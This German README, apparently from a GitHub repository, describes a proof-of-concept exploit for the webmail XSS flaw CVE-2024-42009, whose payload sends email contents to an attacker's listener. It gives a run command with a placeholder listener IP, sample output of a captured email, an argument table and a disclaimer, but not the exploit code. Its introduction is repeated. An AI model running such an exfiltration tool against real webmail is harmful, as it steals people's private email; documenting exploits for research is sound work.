
Dieses Proof of Concept (PoC) demonstriert einen Exploit für CVE-2024-42009, der eine Cross-Site-Scripting-(XSS)-Schwachstelle ausnutzt, um E-Mails aus einer Ziel-Webmail-Anwendung zu extrahieren. Der Angriff injiziert eine schädliche Payload, die E-Mail-Inhalte an einen vom Angreifer kontrollierten Listener exfiltriert.
Dieser Proof of Concept (PoC) demonstriert einen Exploit für CVE-2024-42009, der eine Cross-Site-Scripting (XSS)-Schwachstelle ausnutzt, um E-Mails aus einer Ziel-Webmail-Anwendung zu extrahieren. Der Angriff injiziert eine schädliche Nutzlast, die E-Mail-Inhalte an einen vom Angreifer kontrollierten Listener exfiltriert.
pip install requests beautifulsoup4
Führen Sie das Skript mit den erforderlichen Argumenten aus:
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337
[*] CVE-2024-42009 PoC: Höre auf 192.168.1.100:1337...
[*] Sende Payload für UID 1...
[+] Payload für UID 1 gesendet (Status: 200)
[+] Erfasster E-Mail-Inhalt:
Hallo, dies ist eine Test-E-Mail!
Ich beanspruche keine Anerkennung/Eigentumsrechte/Offenlegung der Schwachstelle und aller entsprechenden Exploits, die in diesem GitHub-Repo gehostet werden – Alle Credits gehen an den Forscher, der sie entdeckt hat; ich habe lediglich einen POC erstellt, um die Schwachstelle basierend auf Daten aus dem Internet zu replizieren. Dieser PoC dient ausschließlich Bildungs- und Forschungszwecken. Nicht autorisierte Tests gegen Systeme ohne Zustimmung sind illegal. Verwenden Sie ihn verantwortungsvoll!
| Argument | Beschreibung |
|---|
-fu, --from-user | Die E-Mail-Adresse des Absenders |
-tu, --to-user | Die E-Mail-Adresse des Empfängers |
-u, --target-url | Die Ziel-Webmail-URL |
-ip, --server-ip | Die IP-Adresse des Angreifer-Listeners |
-p, --server-port | Der Port für den Listener (Standard: 1337) |